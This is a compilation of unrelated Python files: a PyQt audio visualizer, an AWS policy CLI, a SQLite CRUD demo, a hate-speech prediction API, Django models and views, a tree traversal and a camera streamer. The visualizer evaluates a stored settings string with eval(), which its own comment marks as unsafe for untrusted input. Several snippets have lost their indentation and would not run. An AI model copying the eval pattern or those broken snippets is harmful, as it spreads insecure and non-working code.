        self.musicPlay = MyThread()
        self.resize(500, 500)
        self.setWindowTitle('Music')
        # self.setWindowFlags(Qt.FramelessWindowHint)
        self.setAttribute(Qt.WA_TranslucentBackground)
        self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.FramelessWindowHint)
        self.preData = []
        self.speed = 1        # degrees added to the center image rotation per repaint
        self.penWidth = 1
        self.isPlay = False   # paintEvent is a no-op until this is True
        self.rotate = 0       # current rotation angle of the center image

    def setMusicName(self, path):
        """Point the player thread at an audio file."""
        self.musicPlay.init(path)

    def initValue(self, data):
        """Load display settings from a ``dict`` of saved preferences.

        NOTE(review): the keys 'recWidht', 'penWidht', 'win_lox' and 'win_loy'
        are misspelled but load-bearing — callers persist settings under these
        exact names, so they must not be "fixed" here alone.
        """
        self.Lrcfont = data.get('Lrcfont', QFont('SimSun', 15))
        self.showPic = data.get('showPic', True)
        # HACK: musicID is stored as a repr string and re-hydrated with eval;
        # only acceptable because the settings dict is locally produced —
        # never feed this untrusted data.
        self.musicID = eval(data.get('musicID', '{}'))
        self.gap = data.get('gap', 0.5)
        self.recHeight = data.get("recHeight", 400)
        self.recWidth = data.get("recWidht", 400)
        self.PenColor = data.get('penColor', QColor(255, 255, 255))
        self.brushid = data.get('brushid', 6)
        self.type = data.get('type', 0)
        self.brushfill_reverse = data.get("reverse", 'False')
        self.loX = data.get('loX', 200)
        self.loY = data.get('loY', 200)
        self.circleR = data.get('circleR', 100)
        # Index of this list == self.type; used for dispatch in paintEvent.
        self.paintMethod = [self.myPaint_circle_points, self.myPaint_circle_line, self.myPaint_circle_Rec,
                            self.myPaint_line_Rec_one, self.myPaint_line_Rec_two]
        self.chunk = 64
        self.win_Width = data.get('win_Width', 500)
        self.win_Height = data.get('win_Height', 500)
        self.setFixedSize(self.win_Width, self.win_Height)
        self.win_loX = data.get('win_lox', 200)
        self.win_loY = data.get('win_loy', 200)
        self.penWidth = data.get('penWidht', 1)
        self.move(self.win_loX, self.win_loY)

    def setWinAdapt(self):
        """Re-apply the stored window geometry."""
        self.setFixedSize(self.win_Width, self.win_Height)
        self.move(self.win_loX, self.win_loY)

    def setWin_Width(self, width):
        self.win_Width = width
        self.setWinAdapt()

    def setWin_Height(self, height):
        self.win_Height = height
        self.setWinAdapt()

    def setWin_X(self, x):
        self.win_loX = x
        self.setWinAdapt()

    def setWin_Y(self, y):
        self.win_loY = y
        self.setWinAdapt()

    def setSpeed(self, s):
        self.speed = s

    def setShowPic(self, showPic):
        self.showPic = showPic

    def setLrcfont(self, qfont):
        self.Lrcfont = qfont

    def setReverse(self, bool):
        # NOTE: parameter shadows the builtin ``bool``; name kept for API
        # compatibility with existing callers.
        self.brushfill_reverse = bool

    def playVisible(self):
        """Repaint now and re-arm a 0.1 s timer to repaint again."""
        self.update()
        t = threading.Timer(0.1, self.playVisible)
        t.start()

    def myPaint_circle_points(self, qp):
        """Style 0: pairs of dots around a circle, radius offset by amplitude."""
        if self.showPic:
            qp.drawImage(QRect(self.loX - self.circleR, self.loY - self.circleR, 2 * self.circleR, 2 * self.circleR),
                         self.image)
        for i, h in enumerate(self.musicPlay.wavedata):
            self.setBrush(self.brushid, qp, h)
            if (i % 2) == 0:
                d1 = (i * 1.0 / self.chunk) * math.pi * 2
                d2 = (i + self.gap) / self.chunk * math.pi * 2
                h = int(abs(self.recHeight * h))
                point1 = QPoint(int((self.circleR + h) * math.cos(d2) + self.loX),
                                int((self.circleR + h) * math.sin(d2) + self.loY))
                point2 = QPoint(int((self.circleR + h) * math.cos(d1) + self.loX),
                                int((self.circleR + h) * math.sin(d1) + self.loY))
                qp.drawPoints(point1)
                qp.drawPoints(point2)

    def setPenwidth(self, w):
        self.penWidth = w

    def setRecHeight(self, h):
        self.recHeight = h

    def setRecWidth(self, w):
        self.recWidth = w

    def setGap(self, gap):
        self.gap = gap

    def setBrushid(self, id):
        self.brushid = id

    def setChunk(self, chunk):
        # Keep the player's chunk size and our sample count in sync.
        self.musicPlay.setChunk(chunk)
        self.chunk = chunk

    def setQColor(self, color):
        self.PenColor = color

    def setloX(self, x):
        self.loX = x

    def setloY(self, y):
        self.loY = y

    def setR(self, r):
        self.circleR = r

    def setType(self, type):
        self.type = type

    def myPaint_circle_line(self, qp):
        """Style 1: radial lines from the circle edge outward, length by amplitude."""
        if self.showPic:
            qp.drawImage(QRect(self.loX - self.circleR, self.loY - self.circleR, 2 * self.circleR, 2 * self.circleR),
                         self.image)
        for i, h in enumerate(self.musicPlay.wavedata):
            # image.save('/home/void/work/Python/musicPlayer/com/img/circle.png')  # convert first if the format is unsupported
            d1 = (i * 1.0 / self.chunk) * math.pi * 2
            d2 = (i + self.gap) / self.chunk * math.pi * 2
            h = int(abs(self.recHeight * h))
            point1 = QPoint(int((self.circleR + h) * math.cos(d2) + self.loX),
                            int((self.circleR + h) * math.sin(d2) + self.loY))
            point2 = QPoint(int((self.circleR) * math.cos(d1) + self.loX),
                            int((self.circleR) * math.sin(d1) + self.loY))
            qp.drawLine(point1, point2)

    def myPaint_circle_Rec(self, qp):
        """Style 2: radial bars, alternating outward (even i) and inward (odd i)."""
        if self.showPic:
            qp.drawImage(QRect(self.loX - self.circleR, self.loY - self.circleR, 2 * self.circleR, 2 * self.circleR),
                         self.image)
        for i, h in enumerate(self.musicPlay.wavedata):
            # self.setBrush(self.brushid, qp, h)
            if (i % 2) == 0:
                d1 = (i * 1.0 / self.chunk) * math.pi * 2
                d2 = (i + self.gap) / self.chunk * math.pi * 2
                h = int(abs(self.circleR * h))
                point1 = QPoint(int((self.circleR + h) * math.cos(d2) + self.loX),
                                int((self.circleR + h) * math.sin(d2) + self.loY))
                point2 = QPoint(int((self.circleR + h) * math.cos(d1) + self.loX),
                                int((self.circleR + h) * math.sin(d1) + self.loY))
                point3 = QPoint(int(self.circleR * math.cos(d2) + self.loX),
                                int(self.circleR * math.sin(d2) + self.loY))
                point4 = QPoint(int(self.circleR * math.cos(d1) + self.loX),
                                int(self.circleR * math.sin(d1) + self.loY))
                polygon = QPolygon([point1, point2, point4, point3])
                qp.drawPolygon(polygon)
            else:
                d1 = (i * 1.0 / self.chunk) * math.pi * 2
                d2 = (i + self.gap) / self.chunk * math.pi * 2
                h = int(abs(self.recHeight * h))
                point1 = QPoint(int((self.circleR - h) * math.cos(d2) + self.loX),
                                int((self.circleR - h) * math.sin(d2) + self.loY))
                point2 = QPoint(int((self.circleR - h) * math.cos(d1) + self.loX),
                                int((self.circleR - h) * math.sin(d1) + self.loY))
                point3 = QPoint(int(self.circleR * math.cos(d2) + self.loX),
                                int(self.circleR * math.sin(d2) + self.loY))
                point4 = QPoint(int(self.circleR * math.cos(d1) + self.loX),
                                int(self.circleR * math.sin(d1) + self.loY))
                polygon = QPolygon([point4, point3, point1, point2])
                qp.drawPolygon(polygon)

    def setBrush(self, choice, qp, value):
        """Select the fill color scheme ``choice`` (0-7) from amplitude ``value``."""
        if self.brushfill_reverse == 'True':
            value = 1 - value
        if choice == 0:
            # rainbow
            # BUG fix: the green component was passed as a raw float
            # (``random.random() * 255`` without the int cast), which raises
            # TypeError under PyQt5 — QColor requires integer components.
            qp.setBrush(QColor(int(random.random() * 255), int(random.random() * 255), int(random.random() * 255)))
            return
        elif choice == 1:
            # red-purple
            qp.setBrush(QColor(255, int(value * 255), int(random.random() * 255)))
            return
        elif choice == 2:
            # red-orange-yellow
            qp.setBrush(QColor(255, int(random.random() * 255), int(value * 255)))
            return
        elif choice == 3:
            # green-yellow
            qp.setBrush(QColor(int(random.random() * 255), 255, int(value * 255)))
            return
        elif choice == 4:
            # white-grey-black
            qp.setBrush(QColor(int(value * 255), int(value * 255), int(value * 255)))
            return
        elif choice == 5:
            # light blue-yellow
            qp.setBrush(QColor(int(value * 255), 255, int((1 - value) * 255)))
            return
        elif choice == 6:
            # light purple-yellow
            qp.setBrush(QColor(255, int(value * 255), int((1 - value) * 255)))
            return
        else:
            # black
            qp.setBrush(QColor(0, 0, 0))
            return

    def myPaint_line_Rec_one(self, qp):
        """Style 3: one horizontal row of bars growing upward from loY."""
        qp.setPen(self.PenColor)
        for i, h in enumerate(self.musicPlay.wavedata):
            self.setBrush(self.brushid, qp, h)
            qp.drawRect(i * self.recWidth + self.loX, int(self.loY - abs(h) * self.recHeight),
                        int(self.recWidth * (1 - self.gap)), int(abs(h) * self.recHeight))

    def myPaint_line_Rec_two(self, qp):
        """Style 4: bars alternating above (even i) and below (odd i) the loY axis."""
        qp.setPen(self.PenColor)
        for i, h in enumerate(self.musicPlay.wavedata):
            if (i % 2) == 0:
                self.setBrush(self.brushid, qp, h)
                qp.drawRect(i * 10 + self.loX, int(self.loY - abs(h) * self.recHeight),
                            int(self.recWidth * (1 - self.gap)),
                            int(abs(h) * self.recHeight))
            else:
                self.setBrush(self.brushid, qp, h)
                qp.drawRect(i * 10 + self.loX, self.loY, int(self.recWidth * (1 - self.gap)),
                            int(abs(h) * self.recHeight))

    def paintEvent(self, e):
        """Render the current waveform and the lyric line; no-op until playing."""
        if self.isPlay == False:
            return
        # BUG fix: QPainter(self) already activates the painter, so the
        # original follow-up qp.begin(self) double-activated it ("Painter
        # already active" warning). Construct inactive, then begin once.
        qp = QPainter()
        qp.begin(self)
        # NOTE(review): the image is reloaded from disk on every repaint;
        # caching it once would be cheaper — left unchanged to preserve the
        # "pick up a replaced file" behavior. TODO confirm intent.
        image = QImage('img/circle.png')
        transform = QTransform()  # PyQt5
        # martix.speed(90) was the PyQt4 spelling; removed in PyQt5
        transform.rotate(self.rotate)  # PyQt5
        self.rotate += self.speed
        self.image = image.transformed(transform)  # matrix became transform in PyQt5
        pen = QPen(self.PenColor)
        pen.setWidth(self.penWidth)
        qp.setPen(pen)
        # Dispatch to the drawing style selected by self.type.
        self.paintMethod[self.type](qp)
        qp.setFont(self.Lrcfont)
        qp.drawText(QRect(20, self.win_Height - 100, self.win_Width, 80), Qt.AlignCenter, self.musicPlay.current_music_rlc)
        qp.end()
#
# if __name__ == '__main__':
# app = QApplication(sys.argv)
# main = musicGraphy()
# main.setMusicName('/home/void/work/Python/musicPlayer/com/music/music3.wav')
# ##需要制定存储文件才能使用
# # main.initValue()
# main.musicPlay.start()
# main.playVisible()
# main.show()
# sys.exit(app.exec_())
|
import click
from aws_organized_policies import aws_organized_policies
@click.group()
def cli():
    """cli for pipeline tools"""
    # Group container only; sub-commands register via @cli.command() below.
    # Docstring doubles as the CLI --help text, so it is left unchanged.
    pass
@cli.command()
def hello() -> None:
    # Smoke-test command confirming the CLI is wired up.
    print("Hello world")
@cli.command()
@click.argument("role_arn")
def import_organization(role_arn) -> None:
    # role_arn: ARN of the IAM role assumed to read the organization policies.
    # TODO remove print
    print(aws_organized_policies.import_organization_policies(role_arn))
@cli.command()
def make_migrations() -> None:
    # Generate pending policy migrations and echo the result.
    print(aws_organized_policies.make_migrations())
@cli.command()
def apply_migrations() -> None:
    # Apply previously generated policy migrations and echo the result.
    print(aws_organized_policies.apply_migrations())
@cli.command()
def clean_up() -> None:
    # Remove generated artifacts and echo the result.
    print(aws_organized_policies.clean_up())
"""
@cli.command()
def write_policies() -> None:
print(scp_org.write_policies())
@cli.command()
def read_policies() -> None:
print(scp_org.read_policies())
create migration
execute organisation
@cli.command()
def foo() -> None:
print("bar")
@cli.command()
def who_am_i() -> None:
print(scp_demo.who_am_i())
@cli.command()
def how_many_buckets() -> None:
print(scp_demo.how_many_buckets())
@cli.command()
def how_many_accounts() -> None:
print(scp_org.get_client())
@cli.command()
def get_all_policies() -> None:
print(scp_org.get_policies())
"""
|
"""(°C × 9/5) + 32 = °F"""
celsius = float(input('Temperatura em °C: '))
fahrenheit = celsius * 9 / 5 + 32
print('{:.2f} °C é equivalente a {:.2f} °F.'.format(celsius, fahrenheit))
|
"""
OPERACIONES TIPO CURD CON TABLAS EN BASES DE DATOS MYSQLITE
"""
#LEER o READ--------------------------------->
# Importar librería
import sqlite3
# Conexion con base de datos
miCon = sqlite3.connect('weapons_bd')
# Cursor o puntero
miCur = miCon.cursor()
# Ejecutar consulta reed---------------------------------------------------------------------->
# Busca todos los campos segun la CLASE en la bd
miCur.execute("SELECT * FROM WEAPONS WHERE CLASE = 'Automáticas'")
# los datos seran devieltos en un array con fetchall
armas = miCur.fetchall()
# imprimir todo el array
print(armas)
# imprimir dato a dato el array
for arma in armas:
print("Id_arma: ",arma[0]," Nombre Arma: ",arma[1], " Precio: ",arma[2], " Clase: ", arma[3])
# Ejecutar insercion de varios archivos----------------------------------------------------->
liArmas = [
("Colt M1911", 1000, "Automáticas"),
("Berretta 92", 1250, "Automáticas"),
("HK usp", 2500, "Automáticas")
]
# Consulta
#--miCur.executemany("INSERT INTO WEAPONS VALUES(NULL,?,?,?)", liArmas)
#Consulta de Actualizacion update-------------------------------------------------------------->
miCur.execute("UPDATE WEAPONS SET PRECIO=2800 WHERE NOM_WEAPON='HK usp'")
#Borrar un registro----------------------------------------------------------------------------->
# Para evitar error siempre se insertara y borrara
miCur.execute("INSERT INTO WEAPONS VALUES(NULL, 'Ak 47', 4500, 'Automáticas')")
# Confirmacion de la conexion
# Borrar Registro
miCur.execute("DELETE FROM WEAPONS WHERE NOM_WEAPON = 'Ak 47'")
miCon.commit()
# Cierre de conexion
miCon.close()
|
"""API Functions.
This module implements two main functions called via HTTP.
The module structure is the following:
- Function ``predict`` is called with some arguments in order
to predict if some text contains hate speach.
- Function ``train`` is called to re-train the estimator with some new data
which will be stored in ``./estimator/resources/feedback`` folder.
"""
# Author: Alexandru Varacuta
# Email: alexburlacu96@gmail.com
import hug
import estimator.src.model as estimator
def predict(
    content_name: hug.types.text,
    content_data: hug.types.text,
):
    """JSON object with the class to which the content belongs.

    Parameters
    ----------
    content_name : str (Ex: hug.types.text)
        Content's unique name, not the title of it.
    content_data : str (Ex. hug.types.text)
        Content data expressed as a text.

    Returns
    -------
    dict
        content_name : str
            Content's unique name, not the title of it.
        content_class : {"not-hatred", "hatred"}
            The predicted class to which the queried content belongs.
    """
    # Idiom fix: rely on the classifier's truthiness directly instead of the
    # redundant (and identity-fragile) ``== True`` comparison.
    predicted = "hatred" if estimator.classifier(content_data) else "not-hatred"
    return {
        "content_name": content_name,
        "content_class": predicted
    }
def train(n_fits: int = 10):
    """Train the available Machine Learning Estimator.

    Parameters
    ----------
    n_fits : int
        Number of partial fits to be executed over the estimator.

    Returns
    -------
    dict
        summary : dict
            The summary of the training (start_time, training_time, measured_accuracy)
    """
    return {"summary": estimator.train_linear_clf(n_fits)}
|
# Generated by Django 3.0.3 on 2020-10-08 20:08
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema: creates the Tag, Task and Image tables."""

    initial = True

    dependencies = [
    ]

    operations = [
        # Simple label; Images reference Tags through the M2M field below.
        migrations.CreateModel(
            name='Tag',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('tag_name', models.CharField(max_length=200)),
            ],
        ),
        # A to-do item with a completion flag.
        migrations.CreateModel(
            name='Task',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('completed', models.BooleanField(blank=True, default=False, null=True)),
            ],
        ),
        # An uploaded image with placement/size metadata and its tags.
        migrations.CreateModel(
            name='Image',
            fields=[
                ('image_id', models.AutoField(primary_key=True, serialize=False)),
                ('description', models.TextField()),
                ('img', models.ImageField(upload_to='images/')),
                ('x', models.IntegerField()),
                ('y', models.IntegerField()),
                ('height', models.IntegerField()),
                ('width', models.IntegerField()),
                ('tags', models.ManyToManyField(to='api.Tag')),
            ],
        ),
    ]
|
from django.shortcuts import render
from django.views.generic.edit import FormView
from .forms import PreferenceForm
from django.contrib import messages
class CustomerForm(FormView):
    """Collect customer preferences through ``PreferenceForm``."""

    form_class = PreferenceForm
    template_name = 'preferences/main.html'

    # redirect to same home page
    def get_success_url(self):
        """Redirect back to the submitting page after success."""
        return self.request.path

    # checking if form is valid
    def form_valid(self, form):
        """Persist the preferences and flash a confirmation message."""
        form.save()
        messages.add_message(self.request, messages.INFO, 'Send Successfully')
        return super().form_valid(form)

    def form_invalid(self, form):
        # BUG fix: the hook was misspelled ``form_invlid``, so Django's
        # FormView never invoked it and the extra error was never attached;
        # renamed to the real ``form_invalid`` hook.
        form.add_error(None, "Ooh...Something went wrong, check form well")
        return super().form_invalid(form)
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 19 16:43:18 2020
@author: chetanrupakheti
"""
"""
Container of value and right and left children
"""
class Node:
    """A binary-tree node: a value plus optional left and right children."""

    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None
"""
Given a root node, prints out the visited nodes
"""
class SearchAlgorithm:
    """Depth-first and breadth-first traversals of a binary tree.

    Visited node values are collected into ``visitedDFS`` / ``visitedBFS``
    in visit order.
    """

    def __init__(self):
        # BUG fix: these were class-level attributes, so every instance (and
        # every repeated traversal) shared and kept appending to the same
        # lists; they are now per-instance state.
        self.visitedDFS = []  # values in DFS (pre-order) visit order
        self.visitedBFS = []  # values in BFS visit order
        self.q = []           # pending-node queue used by bfs()

    def dfs(self, n):
        """Pre-order depth-first traversal from ``n`` (left subtree first)."""
        self.visitedDFS.append(n.val)
        if n.left is not None:
            self.dfs(n.left)
        if n.right is not None:
            self.dfs(n.right)

    def bfs(self, n):
        """Breadth-first traversal from ``n``.

        Note: children are enqueued right-before-left, preserving the
        original right-to-left visit order within each level.
        """
        self.visitedBFS.append(n.val)
        if n.right is not None:
            self.q.append(n.right)
        if n.left is not None:
            self.q.append(n.left)
        if self.q:
            self.bfs(self.q.pop(0))
if __name__=="__main__":
n1 = Node(6) ### root
n2 = Node(5)
n3 = Node(4)
n4 = Node(3)
n5 = Node(2)
n6 = Node(1)
n1.left = n3
n1.right = n2
n3.left = n5
n3.right = n4
n5.left = n6
algo = SearchAlgorithm()
algo.dfs(n1)
print "visitedDFS",algo.visitedDFS
algo.bfs(n1)
print "visitedBFS",algo.visitedBFS
|
"""My first program for Comp110."""
__author__ = "730399808"
print("Hello, world this is a slight change.")
|
from django.db import models
from django.core.exceptions import ValidationError
from django.utils.translation import gettext as _
from django.utils import timezone
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django.core.validators import MaxValueValidator, MinValueValidator
from crum import get_current_user
from constance import config as conf
from squalaetp.models import Xelon
from utils.file.export import calibre, telecode
class TagXelon(models.Model):
    """Tag a Xelon case for CALIBRE or TELECODE file generation.

    Saving a valid tag immediately generates the corresponding file via the
    ``calibre`` / ``telecode`` export helpers.
    """

    CAL_CHOICES = ((False, _('CAL software')), (True, "Diagbox"))
    TEL_CHOICES = ((False, _('No')), (True, _("Yes")))
    # Xelon case number this tag applies to.
    xelon = models.CharField(max_length=10)
    comments = models.CharField('commentaires', max_length=400, blank=True)
    calibre = models.BooleanField('calibration', default=False, choices=CAL_CHOICES)
    telecode = models.BooleanField('télécodage', default=False, choices=TEL_CHOICES)
    created_at = models.DateTimeField(auto_now_add=True)
    created_by = models.ForeignKey(User, on_delete=models.CASCADE)

    class Meta:
        verbose_name = "Tag Xelon Multi"
        ordering = ['-created_at']

    def clean(self):
        """Reject tags whose export file already exists or whose flags
        contradict the Xelon record's telecoding requirement."""
        try:
            # '1' on the Xelon record means telecoding is mandatory.
            telecode_tag = Xelon.objects.get(numero_de_dossier=self.xelon).telecodage
        except Xelon.DoesNotExist:
            telecode_tag = None
        if self.calibre and calibre.check(self.xelon):
            raise ValidationError(_('CALIBRE file exists !'))
        elif self.telecode and telecode.check(self.xelon):
            raise ValidationError(_('TELECODE file exists !'))
        elif not self.telecode and telecode_tag == '1':
            raise ValidationError(_('TELECODE is required !'))
        elif not self.calibre and not self.telecode:
            # At least one of the two exports must be requested.
            raise ValidationError(_('CALIBRE or TELECODE ?'))

    def save(self, *args, **kwargs):
        """Stamp the creating user on first save and emit the export file(s)."""
        user = get_current_user()
        if user and not user.pk:
            # Anonymous/unsaved users are treated as "no user".
            user = None
        if not self.pk:
            self.created_by = user
        if self.calibre:
            calibre.file(self.xelon, self.comments, user)
        if self.telecode:
            telecode.file(self.xelon, self.comments, user)
        super().save(*args, **kwargs)

    def __str__(self):
        return self.xelon
class CsdSoftware(models.Model):
    """Catalogue of CSD jig software versions and their validation status."""

    STATUS_CHOICES = [
        ('Validé', 'Validé'),
        ('En test', 'En test'),
        ('Etudes', 'Etudes'),
        ('Abandonné', 'Abandonné'),
        ('PDI Only', 'PDI Only')
    ]
    jig = models.CharField(max_length=100)
    new_version = models.CharField(max_length=20)
    old_version = models.CharField(max_length=20, null=True, blank=True)
    link_download = models.CharField(max_length=500)
    status = models.CharField(max_length=50, choices=STATUS_CHOICES)
    validation_date = models.DateField(null=True, blank=True)
    created_at = models.DateTimeField(auto_now_add=True)
    created_by = models.ForeignKey(User, on_delete=models.CASCADE)

    def save(self, *args, **kwargs):
        """Stamp the creating user on first save.

        Consistency fix: like ``ThermalChamber.save`` in this module, only
        assign ``created_by`` when a real authenticated user is available —
        the original unconditionally wrote ``None`` into this non-nullable
        foreign key when no user was resolvable.
        """
        user = get_current_user()
        if user and not user.pk:
            user = None
        if not self.pk and user:
            self.created_by = user
        super().save(*args, **kwargs)

    def __str__(self):
        return self.jig
class ThermalChamber(models.Model):
    """A hot/cold thermal-chamber run booked against a Xelon case."""

    CHOICES = [('FROID', 'FROID'), ('CHAUD', 'CHAUD')]
    operating_mode = models.CharField('mode de fonctionnement', max_length=20, choices=CHOICES)
    xelon_number = models.CharField('N° Xelon', max_length=10, blank=True)
    start_time = models.DateTimeField('heure de début', blank=True, null=True)
    stop_time = models.DateTimeField('heure de fin', blank=True, null=True)
    active = models.BooleanField(default=True)
    created_at = models.DateTimeField(auto_now_add=True)
    created_by = models.ForeignKey(User, on_delete=models.CASCADE)

    def save(self, *args, **kwargs):
        """Stamp the creating user on first save (when one is available)."""
        user = get_current_user()
        if user and not user.pk:
            user = None
        if not self.pk and user:
            self.created_by = user
        super().save(*args, **kwargs)

    def __str__(self):
        # Prefer the user's full name; fall back to the username.
        # Fix: the original fetched first_name/last_name into locals and then
        # ignored them, re-reading the attributes in the f-string.
        first_name, last_name = self.created_by.first_name, self.created_by.last_name
        if first_name and last_name:
            return f"{last_name} {first_name} - {self.xelon_number}"
        else:
            return f"{self.created_by.username} - {self.xelon_number}"
class ThermalChamberMeasure(models.Model):
    """A single timestamped temperature reading from the thermal chamber."""

    datetime = models.DateTimeField('heure de mesure', auto_now_add=True)
    # Raw sensor value; ``temp`` holds its human-readable rendering.
    value = models.IntegerField('valeur mesuré')
    temp = models.CharField('température', max_length=20)

    class Meta:
        verbose_name = "Thermal Chamber Measure"
        ordering = ['-datetime']

    def __str__(self):
        return self.datetime.strftime("%d/%m/%Y %H:%M")
class EtudeProject(models.Model):
    """An engineering-study project with a completion percentage."""

    name = models.CharField('projet', max_length=200)
    # Progress as a percentage, clamped to 0-100 by validators.
    progress = models.PositiveIntegerField('avancée en %', validators=[MaxValueValidator(100), MinValueValidator(0)])

    def __str__(self):
        return self.name
class Suptech(models.Model):
    """A technical-support request, with its workflow status and mailing lists."""

    STATUS_CHOICES = [
        ('En Attente', 'En Attente'), ('En Cours', 'En Cours'), ('Cloturée', 'Cloturée'), ('Annulée', 'Annulée')
    ]
    date = models.DateField('DATE')
    user = models.CharField('QUI', max_length=50)
    xelon = models.CharField('XELON', max_length=10, blank=True)
    product = models.CharField('PRODUCT', max_length=200, blank=True)
    item = models.CharField('ITEM', max_length=200)
    time = models.CharField('TIME', max_length=10)
    info = models.TextField('INFO', max_length=2000)
    rmq = models.TextField('RMQ', max_length=2000, blank=True)
    action = models.TextField('ACTION/RETOUR', max_length=2000, blank=True)
    # NOTE(review): a TextField with choices is unusual (no DB-level choice
    # enforcement); CharField would be typical — confirm before changing.
    status = models.TextField('STATUT', max_length=50, default='En Attente', choices=STATUS_CHOICES)
    deadline = models.DateField('DATE LIMITE', null=True, blank=True)
    category = models.ForeignKey("SuptechCategory", on_delete=models.SET_NULL, null=True, blank=True)
    is_48h = models.BooleanField("Traitement 48h", default=True)
    # Default recipient lists come from the constance runtime configuration.
    to = models.TextField("TO", max_length=5000, default=conf.SUPTECH_TO_EMAIL_LIST)
    cc = models.TextField("CC", max_length=5000, default=conf.SUPTECH_CC_EMAIL_LIST)
    created_at = models.DateTimeField('ajouté le', editable=False, null=True)
    created_by = models.ForeignKey(User, related_name="suptechs_created", editable=False, on_delete=models.SET_NULL,
                                   null=True, blank=True)
    modified_at = models.DateTimeField('modifié le', null=True)
    modified_by = models.ForeignKey(User, related_name="suptechs_modified", on_delete=models.SET_NULL, null=True,
                                    blank=True)
    # Discussion thread attached via the generic SuptechMessage model.
    messages = GenericRelation('SuptechMessage')

    class Meta:
        verbose_name = "SupTech"
        ordering = ['pk']

    def get_absolute_url(self):
        """Canonical detail-page URL for this request."""
        from django.urls import reverse
        return reverse('tools:suptech_detail', kwargs={'pk': self.pk})

    def __str__(self):
        return f"{self.pk} - {self.item}"
class SuptechCategory(models.Model):
    """A support-request category with its responsible manager."""

    name = models.CharField('nom', max_length=200)
    manager = models.ForeignKey(User, related_name="suptechs_manager", on_delete=models.SET_NULL, null=True, blank=True)

    def __str__(self):
        return self.name
class SuptechItem(models.Model):
    """A predefined support-request subject with its notification settings."""

    name = models.CharField('Nom', max_length=100, unique=True)
    # Whether the item requires extra free-text input when selected.
    # NOTE(review): inferred from the field name only — confirm against the form.
    extra = models.BooleanField(default=False)
    category = models.ForeignKey("SuptechCategory", on_delete=models.SET_NULL, null=True, blank=True)
    is_48h = models.BooleanField("Traitement 48h", default=True)
    is_active = models.BooleanField("Actif", default=True)
    # Default recipient lists come from the constance runtime configuration.
    mailing_list = models.TextField("Liste d'email", max_length=5000, default=conf.SUPTECH_TO_EMAIL_LIST)
    cc_mailing_list = models.TextField("liste d'email CC", max_length=5000, default=conf.SUPTECH_CC_EMAIL_LIST)
    to_users = models.ManyToManyField(User, related_name="to_sup_items", blank=True)
    cc_users = models.ManyToManyField(User, related_name="cc_sup_items", blank=True)

    class Meta:
        verbose_name = "SupTech Item"
        ordering = ['name']

    def __str__(self):
        return self.name
class SuptechMessage(models.Model):
    """A comment attached to any object via the contenttypes framework
    (used as a discussion thread on Suptech requests)."""

    content = models.TextField()
    added_at = models.DateTimeField('ajouté le', auto_now=True)
    added_by = models.ForeignKey(User, related_name="message_added", on_delete=models.SET_NULL, null=True)
    # Generic relation target: (content_type, object_id) -> content_object.
    content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
    object_id = models.PositiveIntegerField()
    content_object = GenericForeignKey('content_type', 'object_id')

    class Meta:
        verbose_name = "SupTech Message"
        ordering = ['-added_at']

    def __str__(self):
        return f"Message de {self.added_by} sur {self.content_object}"

    def save(self, *args, **kwargs):
        # Stamp the author from the current request's user (via crum),
        # only when it is a persisted (non-anonymous) user.
        user = get_current_user()
        if user and user.pk:
            self.added_by = user
        super().save(*args, **kwargs)
class SuptechFile(models.Model):
    """A file attachment on a Suptech request, stored under suptech/<year>/<month>."""

    file = models.FileField(upload_to="suptech/%Y/%m")
    suptech = models.ForeignKey("Suptech", on_delete=models.CASCADE)

    class Meta:
        verbose_name = "Suptech File"

    def __str__(self):
        return f"[SUPTECH_{self.suptech.pk}] {self.file.name}"
class BgaTime(models.Model):
    """A usage session of a BGA machine (start stamped automatically on create)."""

    name = models.CharField('Nom de la machine', max_length=100)
    date = models.DateField('date', auto_now_add=True)
    start_time = models.TimeField('heure de START', auto_now_add=True)
    end_time = models.TimeField('heure de FIN', null=True)
    duration = models.IntegerField('durée en secondes', null=True)

    class Meta:
        verbose_name = "BGA Time"
        ordering = ["id"]

    def save(self, *args, **kwargs):
        # Non-model keyword: callers pass status="START"/"STOP" to stamp the end time.
        status = kwargs.pop('status', None)
        if status:
            if self.pk and status.upper() == "STOP":
                # Explicit stop: end the session now (local time).
                self.end_time = timezone.localtime().time()
            elif self.pk and status.upper() == "START":
                # Re-START on an existing session: end it 5 minutes after its
                # start. NOTE(review): presumably a watchdog-style auto-close
                # for sessions restarted without a STOP — confirm intent.
                date_time = timezone.datetime.combine(self.date, self.start_time)
                self.end_time = (date_time + timezone.timedelta(minutes=5)).time()
        super().save(*args, **kwargs)

    def __str__(self):
        return f"{self.name} {self.date} {self.start_time}"
class ConfigFile(models.Model):
    """A software configuration file tracked by name, target path and content."""

    name = models.CharField("nom du logiciel", max_length=100, unique=True)
    path = models.CharField("chemin du fichier", max_length=500, unique=True)
    filename = models.CharField("nom du fichier", max_length=100)
    content = models.TextField("contenu du fichier")

    def __str__(self):
        return self.name
|
#!/usr/bin/env python
import io
import os
import picamera
from config import WIDTH, HEIGHT, FRAMERATE, VFLIP, HFLIP
from subprocess import Popen, PIPE
from threading import Thread
from time import sleep
from HttpServer import HttpServer
from WebsocketServer import WebsocketServer
class CameraOutput(object):
    """File-like sink for picamera raw YUV frames.

    Pipes every written frame into a background ffmpeg process that converts
    raw yuv420p video into an mpeg1video stream readable on ``converter.stdout``.
    """

    def __init__(self, camera):
        print('Spawning background conversion process')
        # ffmpeg reads raw frames on stdin ('-i -') and writes mpeg1 on stdout.
        self.converter = Popen([
            'ffmpeg',
            '-f', 'rawvideo',
            '-pix_fmt', 'yuv420p',
            '-s', '%dx%d' % camera.resolution,
            '-r', str(float(camera.framerate)),
            '-i', '-',
            '-f', 'mpeg1video',
            '-b', '800k',
            '-r', str(float(camera.framerate)),
            '-'],
            stdin=PIPE, stdout=PIPE, stderr=io.open(os.devnull, 'wb'),
            shell=False, close_fds=True)
        # NOTE(review): never read or set elsewhere in this file — appears unused.
